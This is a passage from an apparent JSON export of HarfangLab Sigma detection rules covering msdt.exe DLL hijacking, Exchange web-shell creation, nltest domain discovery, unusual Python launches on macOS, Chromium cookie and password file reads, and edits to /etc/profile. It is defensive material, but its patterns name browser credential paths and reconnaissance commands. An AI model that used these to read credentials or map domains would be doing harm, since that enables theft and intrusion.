"content": "title: DLL Hijacking via msdt.exe\nid: d956a4b6-4d5e-445a-9d2e-65dfe014661d\ndescription: |\n Detects potential Windows DLL Hijacking via msdt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msdt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\Cabinet.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\duser.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\UxTheme.dll'\n - '\\wer.dll'\n - '\\windows.storage.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d956a4b6-4d5e-445a-9d2e-65dfe014661d",
"rule_name": "DLL Hijacking via msdt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msdt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9906f4e-c385-493b-84e3-a7c1603d8f6c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092139Z",
"creation_date": "2026-03-23T11:45:34.092141Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092146Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_exchange.yml",
"content": "title: Suspicious File Created by Exchange Server\nid: d9906f4e-c385-493b-84e3-a7c1603d8f6c\ndescription: |\n Detects the creation of suspicious files by Exchange Server.\n Attackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/22\nmodified: 2025/08/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_file:\n Kind: 'create'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9906f4e-c385-493b-84e3-a7c1603d8f6c",
"rule_name": "Suspicious File Created by Exchange Server",
"rule_description": "Detects the creation of suspicious files by Exchange Server.\nAttackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2025-07-22",
"rule_modified_date": "2025-08-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9a80782-290c-4936-a1a0-e2666950ae0a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083450Z",
"creation_date": "2026-03-23T11:45:34.083453Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083457Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0359/"
],
"name": "t1018_nltest_domain_discovery.yml",
"content": "title: Domain Controllers & Trust Discovered via nltest.exe\nid: d9a80782-290c-4936-a1a0-e2666950ae0a\ndescription: |\n Detects the execution of nltest.exe for domain controllers discovery.\n Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0359/\ndate: 2021/03/31\nmodified: 2025/04/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1482\n - attack.s0359\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n #nltest /dclist\n #nltest /domain_trusts /all_trusts\n selection_bin:\n - Image|endswith: '\\nltest.exe'\n - OriginalFileName: 'nltestrk.exe'\n\n selection_cmd:\n CommandLine|contains:\n - '/dclist'\n - '/domain_trusts'\n - '/dsgetdc'\n - '/dnsgetdc'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-?\\exec\\PDQInventoryScanner.exe'\n - '?:\\Program Files (x86)\\Admin Arsenal\\PDQ Inventory Agent\\PDQInventoryScanner.exe'\n - '?:\\Program Files (x86)\\Schneider Electric\\Power Monitoring Expert\\system\\bin\\vista.exe'\n - '?:\\Program Files\\Silverfort\\Silverfort AD Adapter\\SilverfortController.exe'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows\n exclusion_MDEClientAnalyzer:\n CommandLine|contains: '?:\\WINDOWS\\system32\\nltest.exe /dsgetdc:'\n ParentCommandLine|contains|all:\n - 'powershell.exe -ExecutionPolicy Bypass'\n - 'MDEClientAnalyzer.ps1'\n - '-outputDir'\n\n # As 
seen in GOAD lab - Exchange 2016 CU12\n exclusion_msexchange:\n CommandLine: 'nltest /dclist:'\n ParentCommandLine: 'cmd /c nltest /dclist:'\n GrandparentImage: '?:\\Program Files\\Microsoft\\Exchange Server\\V??\\Bin\\MSExchangeHMWorker.exe'\n\n exclusion_puppet:\n GrandparentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9a80782-290c-4936-a1a0-e2666950ae0a",
"rule_name": "Domain Controllers & Trust Discovered via nltest.exe",
"rule_description": "Detects the execution of nltest.exe for domain controllers discovery.\nAdversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-03-31",
"rule_modified_date": "2025-04-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9c1ee27-920d-4581-a82b-8b5a7408e7c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295222Z",
"creation_date": "2026-03-23T11:45:35.295225Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1569_006_susp_python_execution_macos.yml",
"content": "title: Python Execution in an Uncommon Context\nid: d9c1ee27-920d-4581-a82b-8b5a7408e7c1\ndescription: |\n Detects the Python interpreter being executed by a process in an uncommon folder or by osascript.\n Attackers may use Python to conduct operations on a compromised host.\n It is recommended to check the children of the Python process and the activity of the parents for malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2024/07/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName:\n - '/usr/bin/python*'\n - '/usr/local/bin/python*'\n ProcessSigned: 'true'\n ProcessParentImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes'\n # process\n - '/osascript'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9c1ee27-920d-4581-a82b-8b5a7408e7c1",
"rule_name": "Python Execution in an Uncommon Context",
"rule_description": "Detects the Python interpreter being executed by a process in an uncommon folder or by osascript.\nAttackers may use Python to conduct operations on a compromised host.\nIt is recommended to check the children of the Python process and the activity of the parents for malicious behavior.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9c45e4b-3983-4cd8-ad63-2fb99dffdea9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620953Z",
"creation_date": "2026-03-23T11:45:34.620955Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620967Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_chrome_browser_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Chrome-based Browser Sensitive Files\nid: d9c45e4b-3983-4cd8-ad63-2fb99dffdea9\ndescription: |\n Detects a suspicious access to Chrome-based browser files that hold, for instance, cookies or users's saved passwords.\n Adversaries may steal web application cookies and credentials and use them to gain access to web applications or Internet services as an authenticated user.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/Library/Application Support/Google/Chrome/'\n - '/Users/*/Library/Application Support/BraveSoftware/Brave-Browser/'\n - '/Users/*/Library/Application Support/Microsoft Edge/'\n - '/Users/*/Library/Application Support/com.operasoftware.Opera/'\n - '/Users/*/Library/Application Support/com.operasoftware.OperaGX/'\n - '/Users/*/Library/Application Support/Vivaldi/*/'\n Path|endswith:\n - '/Cookies'\n - '/Login Data'\n - '/Web Data'\n - '/History'\n - '/Bookmarks'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - 
'/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - 
'/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n# Common browser exclusion\n exclusion_chrome:\n - Image:\n - '/Applications/Google Chrome*.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome 
Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.google.Chrome'\n - 'com.google.Chrome.helper'\n\n exclusion_edge:\n - Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper (Plugin).app/Contents/MacOS/Microsoft Edge Helper (Plugin)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.microsoft.edgemac.helper.plugin'\n - 'com.microsoft.edgemac.helper'\n - 'com.microsoft.edgemac'\n\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox Media Plugin Helper'\n\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n\n exclusion_arc:\n - Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n - '/Volumes/Arc/Arc.app/Contents/MacOS/Arc'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'company.thebrowser.Browser'\n\n exclusion_brave:\n - Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - 
'/Applications/Brave Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.brave.Browser*'\n\n exclusion_opera:\n - Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.operasoftware.OperaGX'\n\n exclusion_vivaldi:\n - Image:\n - '/Applications/Vivaldi.app/Contents/MacOS/Vivaldi'\n - '/Applications/Vivaldi.app/Contents/Frameworks/Vivaldi Framework.framework/Versions/*/Helpers/Vivaldi Helper.app/Contents/MacOS/Vivaldi Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.vivaldi.Vivaldi'\n - 'com.vivaldi.Vivaldi.helper'\n\n exclusion_waterfox:\n Image: '/Applications/Waterfox.app/Contents/MacOS/waterfox'\n\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n# end common browser exclusion\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_zen_browser:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'org.mozilla.com.zen.browser'\n - 'app.zen-browser.zen'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_jetbrains:\n ProcessSigned: 'true'\n ProcessSignatureSigningId|startswith: 'com.jetbrains.'\n\n 
exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_zotero:\n ProcessImage: '/Applications/Zotero.app/Contents/MacOS/zotero'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'org.zotero.zotero'\n\n exclusion_alfred:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.runningwithcrayons.Alfred'\n\n exclusion_norton:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.norton'\n\n exclusion_antigravity:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.google.antigravity.helper'\n\n exclusion_cursor:\n Image: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper.app/Contents/MacOS/Cursor Helper'\n\n exclusion_chatgpt:\n Image: '/Applications/ChatGPT Atlas.app/Contents/MacOS/ChatGPT Atlas'\n\n exclusion_claude:\n Image|endswith: '/lib/node_modules/@anthropic-ai/claude-code/vendor/ripgrep/arm64-darwin/rg'\n\n exclusion_comet:\n Image: '/Applications/Comet.app/Contents/MacOS/Comet'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'ai.perplexity.comet'\n\n exclusion_memory_cleaner:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.nektony.Memory-Cleaner-SIII'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9c45e4b-3983-4cd8-ad63-2fb99dffdea9",
"rule_name": "Suspicious Access to Chrome-based Browser Sensitive Files",
"rule_description": "Detects a suspicious access to Chrome-based browser files that hold, for instance, cookies or users's saved passwords.\nAdversaries may steal web application cookies and credentials and use them to gain access to web applications or Internet services as an authenticated user.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9f55b9d-87ee-4d92-ba79-5004d14af637",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.629504Z",
"creation_date": "2026-03-23T11:45:34.596785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596792Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_system_profile_modified_linux.yml",
"content": "title: System Profile Modified\nid: d9f55b9d-87ee-4d92-ba79-5004d14af637\ndescription: |\n Detects an attempt to modify the system profile script (/etc/profile) and scripts in the /etc/profile.d/ directory.\n These scripts contain Linux system-wide environment and startup programs.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to these files.\n It is recommended to investigate the process that read the file for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/profile'\n - '/etc/profile.d/*'\n - TargetPath:\n - '/etc/profile'\n - '/etc/profile.d/*'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_misc:\n Kind:\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/tar'\n - '/usr/bin/coreutils'\n\n exclusion_dpkg:\n - ProcessImage: 